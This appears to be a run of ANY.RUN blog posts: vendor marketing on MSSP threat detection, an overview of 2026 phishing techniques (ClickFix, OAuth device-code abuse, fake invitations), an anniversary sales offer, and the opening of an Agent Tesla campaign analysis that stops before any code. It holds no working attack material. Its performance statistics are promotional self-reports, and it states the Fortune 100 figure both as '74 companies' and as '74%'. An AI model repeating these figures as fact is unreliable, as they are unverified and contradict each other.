The practical path forward combines three capabilities: continuous real-time intelligence that keeps detection systems current automatically, instant IOC investigation that cuts triage from minutes to seconds, and behavioral malware analysis that exposes what attackers actually do — not just static file signatures.

ANY.RUN provides all three. MSSPs that integrate TI Feeds, TI Lookup, Interactive Sandbox, and TI Reports into their workflows report handling significantly more client volume with the same team, while improving detection accuracy and cutting mean time to respond.

The Force Multiplier Approach: Amplifying Human Intelligence

Hiring more analysts isn’t always possible. The global cybersecurity talent shortage makes it difficult. And even if talent were available, inflating staff costs could ruin the business model. Yet, overloading existing teams creates its own risks such as burnout, alert fatigue, and costly mistakes. 

At the core of MSSP growth lies a paradox: human talent is your most valuable asset, but also your most limited resource. 

Threat analysts are the backbone of MSSPs. But their daily work is often filled with repetitive tasks, cognitive overload, and stress from high expectations. Without the right support, even the most capable teams risk crumbling under pressure. 

How To Scale Threat Detection in an MSSP Environment

• Integrate continuously updated threat intelligence into SIEM and detection platforms.
• Automate IOC enrichment and alert prioritization workflows.
• Use live malware analysis to validate suspicious activity faster.
• Standardize investigation and reporting procedures across all analysts.
• Reduce tool fragmentation by connecting investigation and intelligence workflows.
• Use AI-assisted summaries to accelerate triage and escalation.
• Continuously refresh detection logic with real-world attack data.
• Focus analyst time on high-confidence threats instead of manual research.

Analyst Burnout Crisis: Where Efficiency Goes to Die

Why won’t adding more analysts solve your scaling problem? Each additional team member inherits these same systemic issues, multiplying your operational costs without proportionally increasing your detection effectiveness. 

The danger? Analysts become reactive instead of proactive, struggling to keep up rather than driving MSSP growth. 

1. Reduce Analyst Overload by Automating Threat Enrichment and Prioritization

One of the biggest scaling barriers for MSSPs is the growing flood of alerts. Analysts waste time manually validating indicators, checking external sources, and investigating false positives. Over time, this creates fatigue, slower triage, and missed threats.

ANY.RUN helps reduce this operational pressure through Threat Intelligence Feeds and Threat Intelligence Lookup.

Threat Intelligence Feeds continuously deliver fresh malicious IPs, domains, URLs, hashes, and behavioral indicators extracted from live malware analysis sessions. The data can be integrated directly into SIEM, SOAR, EDR, IDS/IPS, and TIP platforms using STIX/TAXII and API integrations.

This allows MSSPs to:

• Automatically enrich alerts with current threat intelligence;
• Filter low-value noise earlier in the workflow;
• Detect emerging campaigns faster;
• Reduce time spent on repetitive IOC validation;
• Improve triage consistency across multiple client environments.

ANY.RUN Threat Intelligence Lookup complements this by giving analysts instant access to deep contextual intelligence connected to suspicious indicators. Instead of manually researching across multiple tools, analysts can immediately investigate domains, IPs, hashes, JA3 fingerprints, processes, command lines, registry keys, and MITRE ATT&CK techniques from a single interface.

The result is a faster, less stressful workflow where analysts spend more time making decisions and less time assembling context manually.

2. Keep Detection Systems Continuously Updated with Fresh Threat Intelligence

Static detection logic becomes obsolete quickly. Attackers rotate infrastructure, modify payloads, and launch new campaigns faster than manual rule updates can keep pace. MSSPs that rely on outdated indicators inevitably develop blind spots.

ANY.RUN lets MSSPs maintain current detections through continuously updated Threat Intelligence Feeds generated from real malware executions inside the Interactive Sandbox.

Unlike traditional static IOC lists, the feeds include:

• Indicators extracted from active attacks;
• Behavioral context tied to malware activity;
• MITRE ATT&CK mappings;
• Threat relationships and campaign associations;
• Real-time updates from thousands of daily analysis sessions.

This helps MSSPs to:

• Detect active threats earlier;
• Improve proactive threat hunting;
• Correlate telemetry with current attacker infrastructure;
• Update SIEM detections automatically;
• Expand coverage without increasing manual workload.

ANY.RUN’s Interactive Sandbox strengthens this process by exposing full malware behavior in a controlled live environment. Analysts can safely observe process execution, network communication, dropped files, persistence mechanisms, and lateral movement attempts in real time.

The Sandbox also generates structured intelligence that flows directly into TI products, turning individual investigations into reusable detection knowledge across all clients.

3. Accelerate Malware Analysis and Incident Investigations to Improve Response Times

As MSSPs grow, slow investigations become a major operational bottleneck. Context switching, fragmented tooling, and manual malware analysis increase MTTR and make SLA compliance harder.

ANY.RUN helps streamline investigations with its Interactive Sandbox. Instead of relying only on static analysis or isolated indicators, analysts can:

• Interact with malware during execution;
• Observe attack chains in real time;
• Analyze phishing payloads safely;
• Visualize process trees and network activity;
• Export IOCs and TTPs immediately;
• Correlate malware behavior with known campaigns.

This dramatically shortens investigation cycles and supports junior analysts in reaching confident conclusions faster.

Combined with Threat Intelligence Lookup, analysts can pivot directly from suspicious artifacts into broader intelligence data, linking incidents to related infrastructure, malware families, and attack patterns without leaving the investigation workflow.

ANY.RUN TI & Malware Analysis Performance

• 36% higher detection rate
• 21 minute faster MTTR
• 30% fewer Tier 1 to Tier 2 escalations
• 20% lower load for Tier 1 analyst
• Trusted by 1,700+ MSSPs around the globe
• Data from 15,000+ organizations across finance, telecom, retail, government, and healthcare

4. Deliver Executive-Ready Reporting Faster with AI-Assisted Analysis 

Client reporting is one of the most time-consuming parts of MSSP operations. Security teams often spend hours translating technical investigation data into understandable business context. ANY.RUN helps accelerate reporting with Tier 1 reports and AI Summary capabilities.

Tier 1 reports provide SOC-ready summaries that consolidate malware behavior, indicators, TTPs, and investigation findings into structured reports that analysts can use immediately during triage and escalation workflows.

AI Summary further reduces reporting time by automatically generating concise explanations of malicious activity observed during analysis sessions. Instead of manually reviewing every process and connection, analysts receive quick summaries highlighting:

• Threat behavior,
• Infection chains,
• Persistence mechanisms,
• Network activity,
• Risk indicators,
• Recommended investigation focus areas.

This helps MSSPs to:

• Reduce time spent writing reports,
• Improve communication between Tier 1 and Tier 2 analysts,
• Deliver faster client updates,
• Standardize reporting quality across teams,
• Shorten escalation cycles.

Together, Tier 1 reports and AI Summary allow analysts to move from raw telemetry to actionable conclusions significantly faster while maintaining consistency across growing client environments.

Scale Multi-Client Operations Without Linear Headcount Growth

The core MSSP scaling challenge is simple: revenue can grow exponentially, but analyst capacity usually cannot. Without workflow optimization, every new client increases operational pressure almost proportionally.

ANY.RUN helps break this pattern by creating a shared intelligence layer across detection, investigation, and reporting workflows.

Interactive Sandbox, Threat Intelligence Feeds, Threat Intelligence Lookup, Tier 1 reports, and AI Summary work together to:

• Reduce manual enrichment;
• Minimize tool switching;
• Standardize investigations;
• Accelerate analyst onboarding;
• Lower escalation rates;
• Improve consistency across client environments;
• Increase investigation throughput per analyst.

This allows MSSPs to scale operations more sustainably while maintaining detection quality and analyst well-being.

Get Special ANY.RUN Offers Before May 31

To mark its 10th anniversary, ANY.RUN is offering special conditions for SOCs, MSSPs, and enterprise security teams that want to strengthen phishing analysis, threat intelligence, and response readiness.

Trusted by security teams worldwide, including 74 Fortune 100 companies, ANY.RUN helps organizations bring earlier threat visibility into the workflows where response decisions happen.

Until May 31, teams can access anniversary offers across key ANY.RUN solutions, including:

• Interactive Sandbox to safely analyze suspicious links, files, emails, and phishing pages with behavior-based visibility, with bonus seats and exclusive pricing available for teams.
• Threat Intelligence solutions with extra months to help teams connect single cases to related infrastructure, IOCs, campaigns, and broader threat activity.

This is a great opportunity to close social engineering blind spots, reduce gray-zone investigations, and give teams clearer evidence before trusted workflows turn into exposure.

About ANY.RUN  

Trusted by over 600,000 cybersecurity professionals and 15,000+ organizations in finance, healthcare, manufacturing, and other critical industries, ANY.RUN helps security teams investigate threats faster and with greater accuracy.  

Our Interactive Sandbox accelerates incident response by allowing you to analyze suspicious files in real time, watch behavior as it unfolds, and make confident, well-informed decisions.  

Our Threat Intelligence Lookup and Threat Intelligence Feeds strengthen detection by providing the context your team needs to anticipate and stop today’s most advanced attacks. ANY.RUN is SOC 2 Type II attested, reflecting strong security controls and a commitment to protecting customer data. 

Try ANY.RUN to strengthen your proactive defense 

FAQ

The post How Can MSSPs Scale Threat Detection Without Burning Out Their Analysts? appeared first on ANY.RUN's Cybersecurity Blog.

For CISOs, that is the real social engineering problem in 2026: attacks are no longer easy to separate from normal business activity. And when the SOC cannot quickly see what happened after the click, every investigation becomes a race against exposure. 

The New CISO Problem: Social Engineering That Looks Like Business as Usual 

Modern social engineering attacks are harder to stop because they no longer rely only on suspicious attachments or poorly written emails. They copy the workflows employees use every day. 

For CISOs, this leads to difficult operational issues. The SOC may detect a suspicious link, page, or login attempt, but still lack the full context to understand whether the incident led to credential theft, token abuse, remote access, or exposure of business-critical systems. 

That creates several problems at once: 

• Too many gray-zone alerts that require manual validation 
• Slow confidence during triage because the activity looks close to legitimate work 
• Context gaps between Tier 1, Tier 2, and IR teams 
• Delayed prioritization when the business impact is unclear 
• Higher pressure on senior SOC resources due to unnecessary or poorly prepared escalations 
• Limited executive visibility into whether the incident is a minor phishing attempt or a real access risk 

This is why modern social engineering is a visibility, escalation, and decision-making problem for the entire security operation. 

1. Fake Microsoft Login Pages Still Work Because They Abuse Daily Business Habits 

Fake Microsoft login pages remain one of the most common social engineering tactics because they imitate a workflow employees already trust: opening a shared file, checking email, accessing OneDrive, or signing into Microsoft 365. 

View analysis session with Microsoft page abuse 

For security leaders, the concern is that this attack still hits one of the most valuable parts of the business: identity. Microsoft accounts often connect employees to email, files, SaaS tools, internal conversations, customer communication, and partner access. Once one account is compromised, the impact can quickly move beyond a single inbox. 

CISO blind spot: The SOC may treat a fake login page as a simple phishing event, while the real business risk may be account takeover, email compromise, or lateral movement through connected cloud services. 

2. Banking Phishing Turns Employee Trust into Financial Exposure 

Banking-themed phishing attacks are especially risky because they target workflows employees may already treat as urgent: payment alerts, transaction issues, account notices, invoices, or financial document requests. 

In the BlobPhish campaign observed by ANY.RUN, attackers impersonated major financial and cloud services, including Chase, Capital One, FDIC, E*TRADE, Schwab, Microsoft 365, OneDrive, and SharePoint. The campaign used phishing pages that appeared directly inside the browser, making them harder for traditional tools to detect through normal URL, file, or network visibility. 

View the observed analysis session in ANY.RUN sandbox 

The danger is that these lures touch systems tied to money, approvals, vendors, customer data, and cloud access. A single captured credential can open the door to payment fraud, mailbox abuse, partner-facing scams, or sensitive data exposure. 

CISO blind spot: A banking phishing lure may look like a narrow credential-theft attempt, but in a corporate environment, it can expose financial operations, cloud accounts, partner communication, and sensitive business data. 

3. ClickFix Attacks Abuse Employee Trust in AI Tools 

ClickFix attacks are becoming more dangerous as employees rely on AI tools for coding, research, automation, and daily productivity. Instead of sending a suspicious attachment, attackers imitate the tools people already use and guide them through actions that feel like normal setup or troubleshooting. 

In one ANY.RUN case, attackers used fake documentation pages for popular AI tools, including Claude Code and Grok. The victim was prompted to run a command that appeared to be part of the installation or configuration process. In reality, that action launched a malware infection on macOS. 

Observe the attack chain in a live sandbox session 

This tactic is especially risky because it targets high-value users. Developers, product teams, finance employees, and executives often use Macs and AI tools, and they may also have access to source code, cloud environments, financial systems, customer data, or internal documents. 

CISO blind spot: ClickFix attacks may not look like a traditional phishing incident. The user is not opening a strange attachment. They are following instructions from what appears to be a trusted AI tool page. That makes the attack harder to catch early and easier to underestimate until credentials, session data, or endpoint access are already exposed. 

4. OAuth Device Code Phishing Turns Legitimate Microsoft Login into an Access Risk 

OAuth device code phishing is dangerous as it does not follow the usual fake-login-page pattern. The victim is sent to a real Microsoft verification page, enters a code, completes authentication, and may even pass MFA. 

In the EvilTokens campaign observed by ANY.RUN, attackers abused Microsoft’s OAuth Device Code flow to get access tokens without directly stealing the user’s password. More than 180 phishing URLs were detected in one week, showing how quickly this technique can spread across Microsoft 365 environments. 

View sample analysis in ANY.RUN Interactive Sandbox 

This makes the attack harder to recognize as phishing. From the user’s side, the process looks legitimate. From the security team’s side, the activity may blend into normal authentication traffic until the account is already exposed. 

CISO blind spot: OAuth device code phishing may not trigger the same warning signs as a fake login page. The user authenticates through Microsoft, but the attacker receives the token. That can lead to Microsoft 365 account takeover, mailbox access, cloud data exposure, and delayed response because the compromise does not look like classic credential theft. 

5. Fake Invitations Turn Simple Lures into Access Risk 

Fake invitation phishing works because it feels harmless. An event invite, a CAPTCHA check, and a sign-in page can look like a normal online workflow, especially when employees are used to opening meeting links, webinars, vendor invitations, and shared business events. 

In a U.S.-targeted campaign analyzed by ANY.RUN, attackers used fake event invitation pages to push victims toward credential theft, OTP interception, or remote management tool installation. Some pages collected email credentials and one-time codes, while others delivered legitimate RMM tools such as ScreenConnect, ITarian, Datto RMM, ConnectWise, and LogMeIn Rescue. 

View analysis session in ANY.RUN Sandbox

That makes the campaign harder to judge quickly. The same type of lure can lead to different outcomes: stolen mailbox access, intercepted MFA codes, or remote access inside the environment. For the SOC, this creates a gray-zone investigation where several small signals need to be connected before the real risk becomes clear. 

CISO blind spot: A fake invitation may look like a low-priority phishing page, but it can become an access problem fast. If the SOC cannot quickly see whether the page led to credential theft, OTP capture, or RMM installation, response may start only after exposure has already grown. 

How CISOs Can Close These Social Engineering Blind Spots 

The hardest part of modern social engineering response is often not spotting something suspicious. It is proving what happened next fast enough to make the right decision. 

A suspicious email, link, page, or file may be detected, but the SOC still needs to answer the questions that determine the real risk: Did the user submit credentials? Was MFA or OAuth abused? Was remote access delivered? Did the activity reach an endpoint? Does this require escalation, containment, or leadership attention? 

To close this gap, social engineering investigations need to move through a clearer workflow: 

1. Validate the threat before it becomes a bigger incident 

When a suspicious email, link, file, or phishing page reaches the SOC, the priority is not only to label it as malicious or benign. The team needs to understand what the object actually does and how far the activity could go if left unchecked. 

ANY.RUN’s Interactive Sandbox lets teams safely open the suspicious object and observe the full behavior in real time: redirects, fake login pages, OTP prompts, file downloads, remote access activity, and concealment attempts. Instead of guessing from isolated alerts, the SOC can see and interact whenever needed. 

This gives teams earlier certainty during the most critical stage of triage. They can confirm the real risk faster, decide whether the case needs escalation, and reduce the chance that a “small” social engineering alert becomes a larger business incident. 

2. Turn investigation results into evidence the whole SOC can use 

Even when the attack is visible, teams still need to communicate the findings clearly. Raw telemetry can slow down handoffs, create context loss, and make it harder for managers to understand severity. 

With Tier 1 Reports and AI Summary inside the sandbox, findings become structured, SOC-ready context: what happened, why it matters, what evidence supports escalation, and where the team should focus next. 

This gives teams several practical benefits: 

• Faster triage because Tier 1 gets a clear threat overview without manually rebuilding the attack story 
• Cleaner escalations as Tier 2 and IR receive context, not just raw indicators 
• Less context loss when the case moves between teams or shifts 
• More consistent reporting across analysts and incidents 
• Clearer management visibility into severity, exposure, and required next steps 
• Better response decisions because teams can act on confirmed behavior, not assumptions 

This way, social engineering investigations do not stop at “we found suspicious activity.” They become ready-to-use evidence for prioritization, escalation, containment, and leadership reporting. 

3. Understand whether the case is isolated or part of a wider campaign 

After the behavior is confirmed, the next question is scope. Is this one phishing attempt, or part of a broader campaign targeting similar companies, industries, or regions? 

With ANY.RUN Threat Intelligence, teams can pivot from one case to related domains, IOCs, URL patterns, infrastructure, and similar sandbox sessions. This gives the SOC broader context for detection, hunting, and prioritization, so teams are not making decisions from one alert alone. 

For security leaders, this creates a stronger operating model for social engineering response: 

• Earlier risk confirmation before credential theft, token abuse, or remote access turns into a larger incident 
• Better campaign awareness when one suspicious case is connected to related infrastructure and repeated attack patterns 
• Stronger SOC consistency because investigations follow the same process instead of depending on individual experience 
• Improved resource allocation as senior teams focus on cases with confirmed exposure, not unclear alerts 
• More defensible incident decisions based on visible behavior, threat context, and structured reporting 
• Clearer business-risk communication when leaders need to understand what happened, what is exposed, and what happens next 

This turns social engineering response into a repeatable process: observe the attack, enrich the context, document the findings, and act before exposure spreads. 

From Social Engineering Visibility to SOC Performance 

Closing social engineering blind spots is about reducing the operational drag these attacks create across the SOC: unclear alerts, manual validation, repeated handoffs, and delayed decisions. 

ANY.RUN helps security teams improve that process with interactive sandbox analysis and threat intelligence solutions working together in one investigation workflow.

Organizations using ANY.RUN report: 

• 21 minutes faster MTTR per case, helping reduce the time between detection and containment 
• 94% faster triage reported by users during suspicious file, URL, and phishing investigations
• 30% fewer Tier 1 to Tier 2 escalations, helping protect senior team capacity  
• Up to 20% lower Tier 1 workload by reducing manual investigation effort 
• Up to 3x stronger SOC efficiency across validation, enrichment, escalation, and response workflows 

These results show the practical value of closing social engineering blind spots: fewer delays, less wasted effort, and faster confidence when the business needs a clear answer. 

Get Special ANY.RUN Offers Before May 31

To mark its 10th anniversary, ANY.RUN is offering special conditions for SOCs, MSSPs, and enterprise security teams that want to strengthen phishing analysis, threat intelligence, and response readiness.

Trusted by security teams worldwide, including 74 Fortune 100 companies, ANY.RUN helps organizations bring earlier threat visibility into the workflows where response decisions happen.

Until May 31, teams can access anniversary offers across key ANY.RUN solutions, including:

• Interactive Sandbox to safely analyze suspicious links, files, emails, and phishing pages with behavior-based visibility, with bonus seats and exclusive pricing available for teams.
• Threat Intelligence solutions with extra months to help teams connect single cases to related infrastructure, IOCs, campaigns, and broader threat activity.

This is a great opportunity to close social engineering blind spots, reduce gray-zone investigations, and give teams clearer evidence before trusted workflows turn into exposure.

About ANY.RUN 

ANY.RUN delivers cybersecurity solutions built to support real-world SOC operations. Its platform helps security teams investigate threats faster, make informed decisions, and apply threat intelligence across detection, triage, response, and reporting workflows. 

The company’s solutions include the Interactive Sandbox for enterprise-grade malware and phishing analysis, as well as ANY.RUN Threat Intelligence solutions, including TI Lookup, TI Feeds, TI Reports, and YARA Search. Together, they provide fresh, behavior-based intelligence built on live attack analysis. 

ANY.RUN is SOC 2 Type II attested, reflecting strong security controls and a commitment to protecting customer data. For SOCs, MSSPs, and enterprise security teams, ANY.RUN helps reduce investigation uncertainty, improve triage speed, and turn complex threat activity into clear, actionable evidence. 

The post Top 5 Phishing-Driven Social Engineering Attacks on Companies in 2026 appeared first on ANY.RUN's Cybersecurity Blog.

ANY.RUN has grown with those teams. 

What started as an interactive sandbox is now a trusted company with threat analysis and intelligence solution used by 15,000+ organizations, 600,000 security professionals, and teams at Fortune 100 companies worldwide. 

For our 10th anniversary, we want to thank everyone who helped us get here: our users, customers, partners, and community. 

To celebrate, we’re launching special offers across Interactive Sandbox and Threat Intelligence solutions, including extra months, discounts, exclusive pricing, and more value for your team. 

Grab Your Anniversary Offer Until May 31 

From May 18 to May 31, we’re celebrating ANY.RUN’s 10th anniversary with special offers across our core threat analysis and intelligence solutions. 

This year’s offers are available for Hunter, Enterprise Suite, and Threat Intelligence solutions. Depending on your plan and team needs, you can get extra months, special discounts, exclusive pricing, or added value to support your security workflows. 

Whether you’re an individual researcher, a SOC team, an MSSP, or an enterprise organization, this is a good moment to expand your access to ANY.RUN, improve threat visibility, and give your team more room to investigate, validate, and respond faster. 

Interactive Sandbox Anniversary Offers 

ANY.RUN’s Interactive Sandbox helps security teams investigate suspicious files, links, phishing pages, and malware behavior in real time. Instead of relying only on static alerts or delayed reports, teams can safely open, interact with, and observe threats as they behave, giving them the evidence they need to act faster. 

• For individual security professionals, the Hunter plan gives more privacy, flexibility, and access for everyday malware and phishing investigations. 

• For SOCs and MSSPs, the Enterprise Suite brings interactive threat analysis into a secure team environment. It gives organizations private analysis, team collaboration, user and role management, SSO, access control, and shared visibility across investigations. 

This matters most in high-pressure security operations, where teams need to move from alert to decision quickly. Tier 1 specialists can open suspicious files, URLs, and phishing pages in a safe cloud environment, observe real behavior, collect IOCs, and decide whether a case needs escalation. Senior specialists get fewer low-confidence cases. SOC managers get clearer evidence for containment, reporting, and customer communication. 

That is why more than 1,700 MSSPs worldwide trust ANY.RUN to support malware analysis, phishing investigation, and faster threat validation across customer environments. 

The outcomes show up across the full SOC process: 

• 94% of users report faster triage, because they get clear behavior-based evidence early in the investigation 
• Up to 20% decrease in Tier 1 workload, as routine malware and phishing checks become faster and easier to complete 
• 30% reduction in Tier 1 to Tier 2 escalations, because more cases can be validated before they reach senior specialists 
• 21-minute MTTR reduction per case, helping teams respond faster when a real threat is confirmed 
• Lower infrastructure costs, since teams can use a secure cloud-based sandbox instead of maintaining local analysis environments 
• Broader threat coverage, with one cloud-based environment for analyzing threats across Windows, macOS, Linux, and Android instead of relying on separate platforms or manual workarounds 
• Less alert fatigue, with instant threat insights that help teams focus on real risk instead of chasing every suspicious signal 
• Lower business risk, because earlier detection and better context support faster containment and more informed response 

For teams under pressure, this leads to a cleaner investigation process, better use of analyst time, stronger control over sensitive cases, and clearer evidence when decisions need to be made quickly. 

During ANY.RUN’s 10th anniversary campaign, SOCs, MSSPs, enterprises, and individual security professionals can get access to these Interactive Sandbox capabilities with extra value, special discounts, exclusive pricing, or more flexible options. 

Explore the Interactive Sandbox anniversary offers and give your team faster investigations, stronger privacy, and measurable SOC impact. 

Threat Intelligence Solutions Anniversary Offer 

Threat intelligence is most valuable when it helps teams move from an indicator to a decision faster. 

ANY.RUN Threat Intelligence solutions give SOC and MSSP teams fresh, behavior-based context powered by live attack data from 15,000 organizations and 600,000 security professionals worldwide. Instead of working with isolated IOCs, teams can connect indicators to related samples, infrastructure, attacker behavior, campaigns, and detection logic. 

This helps teams improve the SOC processes where context matters most: 

• Faster triage: Validate suspicious hashes, IPs, domains, URLs, and other indicators with clear context on whether they are connected to malware, phishing activity, or active campaigns. 
• More confident response: Move from one indicator to the full attack picture, including related infrastructure, artifacts, behavior, and connected threats that may also need containment. 
• Evidence-driven threat hunting: Test hypotheses against real-world attack data, find related samples, and confirm whether suspicious patterns are relevant to the organization. 
• Stronger detection engineering: Build and improve detection rules based on current malware and phishing behavior, not outdated or theoretical threat models. 
• Clearer reporting: Give SOC leaders, MSSP customers, and internal teams stronger evidence behind investigation and response decisions. 

With TI Lookup, TI Feeds, TI Reports, and YARA Search, teams can bring threat intelligence directly into the places where SOC work usually slows down: alert validation, investigation, hunting, detection, and reporting. 

Instead of checking one IOC at a time or jumping between disconnected tools, teams get fresh attack context in one workflow. They can validate suspicious indicators faster, understand related infrastructure, uncover connected samples, and see how an attack behaves in real environments. 

For SOC and MSSP teams, this leads to practical outcomes: 

• Faster alert validation, because teams can check indicators against real-world attack data in seconds 
• Fewer uncertainty-driven escalations, because Tier 1 teams get clearer context before passing cases to senior specialists 
• Better incident scoping, as responders can connect one IOC to related infrastructure, artifacts, behavior, and campaigns 
• Stronger threat hunting, with access to live malware and phishing data for testing hypotheses and finding related samples 
• More accurate detections, since teams can build and improve rules based on current attack behavior 
• Lower investigation time, because analysts spend less time switching between tools and more time acting on confirmed risk 
• Stronger reporting, with evidence that is easier to explain to SOC leaders, customers, and internal teams 

Together, these outcomes help teams reduce noise, improve response accuracy, and use security resources where they matter most: on real threats with confirmed business risk. 

During ANY.RUN’s 10th anniversary campaign, teams can access special value for Threat Intelligence solutions, including extra months and flexible options.

Explore the Threat Intelligence anniversary offer and bring fresh, actionable attack context into your SOC. 

Trusted by Teams That Work with Real Threats Every Day 

Ten years of ANY.RUN is also ten years of building for the people who use it in real investigations: SOC teams, MSSPs, enterprise security teams, researchers, and threat hunters. 

Today, ANY.RUN supports the work security teams do every day: validating alerts, investigating suspicious activity, collecting evidence, escalating confirmed threats, and reporting outcomes clearly. 

For customers, the value is often felt in one simple change: less time lost to uncertainty. 

As one Fortune 500 technology company shared: “We just stopped losing time to uncertainty. Now we can confirm what’s happening faster and escalate only when it actually makes sense.” 

For MSSPs, the value also shows up in reporting and customer communication. A healthcare MSSP described the change this way: “Since we implemented new solutions, every investigation now comes with evidence and threat data, from MITRE tags to screenshots.” 

This is what ANY.RUN continues to build for: faster decisions, clearer evidence, fewer unnecessary escalations, and security workflows that are easier to scale across teams and customers. 

Today, 74% of Fortune 100 companies rely on ANY.RUN to strengthen their SOC operations, alongside SOC and MSSP teams around the world. 

As we celebrate our 10th anniversary, this trust means a lot. It is also why this year’s offers are a chance for more teams to get extra value from solutions already helping security operations investigate faster, reduce workload, and respond with more confidence. 

Thank You for Trusting and Growing with Us

ANY.RUN’s 10th anniversary is a moment to thank the people who helped us build, improve, and grow along the way. 

To our users, customers, partners, researchers, and community — thank you for growing with us, trusting us, sharing your feedback, and making ANY.RUN part of your daily security work. 

And we’re just getting started. 

More updates, product improvements, threat intelligence capabilities, and security operations features are coming. Our goal stays the same: to help teams investigate threats faster, reduce uncertainty, and make stronger decisions when every minute matters. 

Celebrate 10 years of ANY.RUN with us and explore your anniversary offer before May 31! 

About ANY.RUN 

ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. Its tools help security teams understand threats faster, make informed decisions, and use threat intelligence across detection, investigation, and response workflows. 

The company’s solutions include Interactive Sandbox for enterprise-grade malware and phishing analysis, as well as ANY.RUN Threat Intelligence solutions with modules such as TI Lookup, TI Feeds, TI Reports, and YARA Search. Together, they give teams fresh, behavior-based intelligence built on live attack analysis. 

ANY.RUN is SOC 2 Type II attested, reflecting strong security controls and a commitment to protecting customer data. For SOCs, MSSPs, and enterprise teams, ANY.RUN helps reduce investigation uncertainty, improve triage speed, and turn threat analysis into clear, actionable evidence. 

Claim your offer and equip your SOC to reduce delays and respond with confidence ➔ 

The post ANY.RUN Turns 10: Special Offers for Stronger Security Operations appeared first on ANY.RUN's Cybersecurity Blog.

Credential theft malware rarely announces itself with ransomware-level noise. Instead, it operates like a silent siphon hidden inside everyday business workflows: invoices, payroll files, purchase orders, procurement requests. Agent Tesla campaigns are especially dangerous because they target the operational arteries of organizations, harvesting credentials that enable deeper compromise, business email compromise (BEC), financial fraud, cloud account takeover, and long-term espionage. 

Key Takeaways 

• Agent Tesla remains highly effective in LATAM due to cheap licensing and easy configuration combined with region-specific social engineering. 

• Multi-stage loaders using .NET Reactor 6.x and Process Hollowing evade most static detection tools. 

• Financial and procurement departments are high-priority targets through purchase order and payroll-themed lures. 

• Compromised legitimate infrastructure (e.g., Romanian FTP servers) complicates blocking and attribution. 

• Fileless execution and cleartext FTP exfiltration make dynamic sandbox analysis essential. 

• The campaign has maintained the same C2 infrastructure for at least 18 months, indicating sustained, professional operations. 

• Organizations can significantly improve defenses through interactive sandboxing, targeted awareness training, and outbound FTP monitoring. 

This investigation reveals an active Agent Tesla campaign specifically targeting Chilean and broader LATAM enterprises through procurement-themed phishing lures. The malware chain combines social engineering, obfuscated loaders, process hollowing, fileless execution, and FTP-based credential exfiltration to evade traditional defenses.

For organizations, the business impact extends far beyond a single infected endpoint: stolen browser, VPN, email, and FTP credentials can become the entry point for supply chain compromise, lateral movement, and unauthorized access to sensitive corporate systems.

Threat Overview: Agent Tesla in the LATAM Context 

Latin America has become an increasingly attractive target for commodity malware operators. The combination of rapid digitalization, growing SME supply chains, and historically lower security maturity makes the region fertile ground for credential stealers. Among these, Agent Tesla consistently ranks as one of the most deployed families — cheap to license, easy to configure, and devastatingly effective against organizations with limited email security controls. 

In March 2026, during routine threat hunting, we identified a malware sample delivered inside a RAR archive named Orden de compra_pdf.uu — Spanish for ‘purchase order’ — a social engineering lure specifically crafted for the Chilean and broader LATAM business environment. What followed was a multi-day investigation that uncovered not just a single sample, but a persistent infrastructure that has been quietly exfiltrating credentials from LATAM enterprises since at least mid-2024. 

Agent Tesla is a .NET-based keylogger and credential stealer, commercially sold as a ‘Remote Administration Tool’ since 2014. Despite its age, it remains highly active because operators can purchase access cheaply and configure it through a GUI without programming knowledge. Its primary capabilities include: 

• Credential theft — browsers (Chrome, Firefox, Edge), email clients (Outlook, Thunderbird), FTP clients; 
• Keylogging — captures all keystrokes in real time; 
• Screenshot capture — periodic desktop screenshots;
• Clipboard monitoring — intercepts copied passwords and crypto wallet addresses; 
• Exfiltration channels — SMTP, FTP, HTTP, or Telegram bot API. 

In the LATAM context, Agent Tesla operators typically use spear-phishing lures themed around business documents: purchase orders, payment receipts, payroll files, and invoices. This campaign follows that pattern precisely, targeting the financial and procurement workflows of Chilean companies. 

Business Impact: Why Agent Tesla Is a Serious Enterprise Threat 

While Agent Tesla is often categorized as a “commodity stealer,” the operational impact on organizations can be severe. In many environments, credential theft creates the conditions for larger and more expensive incidents. 

Financial Fraud and Business Email Compromise 

The campaign specifically impersonates procurement and finance-related documents, indicating deliberate targeting of employees who routinely handle invoices, payment approvals, supplier communications, and payroll operations. Once email credentials are stolen, attackers can hijack ongoing financial conversations, redirect payments, or conduct BEC attacks that appear fully legitimate.  

Supply Chain Exposure 

Compromised FTP, VPN, and email accounts may provide indirect access to suppliers, logistics providers, distributors, and partner organizations. This creates a multiplier effect where a single infection can propagate trust-based compromise across the wider business ecosystem. 

Cloud and SaaS Account Takeover 

Modern browsers store credentials for cloud platforms, CRMs, collaboration tools, and internal portals. Theft of browser credential databases can therefore expose Microsoft 365, Google Workspace, Salesforce, SAP, and other critical business systems without the attacker needing to deploy ransomware or exploit vulnerabilities. 

Long-Term Persistence and Espionage 

Agent Tesla’s keylogging, clipboard interception, and screenshot functionality enable prolonged surveillance of employee activity. This allows operators to collect sensitive information gradually over time, including contracts, credentials, API keys, internal communications, and financial data. 

Risk Summary: A single employee opening a convincing purchase order email can result in complete credential compromise across your organization’s digital tools. This campaign has operated undetected against LATAM businesses for over 18 months. The financial and operational cost of remediation significantly exceeds the cost of proactive prevention. 

This article walks through the full investigation methodology, from initial triage to infrastructure correlation, and demonstrates how ANY.RUN’s interactive sandbox and threat intelligence capabilities accelerated key phases of the analysis.  

The full detonation session is publicly available in the sandbox.  

Campaign Technical Analysis

1. Initial Triage: The Malicious RAR Archive 

Sample Identification 

The investigation began with a RAR v5 archive submitted for analysis. Key static properties: 

The file extension .uu is a deliberate obfuscation tactic. While the file is actually a RAR archive, the unusual extension is intended to confuse automated scanners and reduce detection rates on email gateways that rely on extension-based filtering. 

The Social Engineering Angle 

The filename Orden de compra_pdf.uu translates to ‘Purchase order PDF’ in Spanish. This is a high-value lure for B2B environments: purchase orders are expected, frequently shared by email, and often opened without scrutiny by accounts payable and procurement personnel. The ‘_pdf’ substring creates a false sense of legitimacy, suggesting the recipient will open a PDF document. 

This social engineering pattern is consistent across the 80+ samples we identified communicating with the campaign’s infrastructure –  all impersonating financial or procurement documents in Spanish: 

• Nómina de sueldos.pdf_008.exe — payroll; 
• Comprobante de pago.pdf.exe — payment receipt; 
• Nomina_Sept2025_Confidencial.xlam — confidential payroll; 
• Orden de Compra.xlam — purchase order (macro-enabled spreadsheet); 
• OC 20240814.xlam / OC 20240813.xlam — dated order confirmations. 

2. Kill Chain Analysis 

Stage 1 — JScript Encoded Dropper 

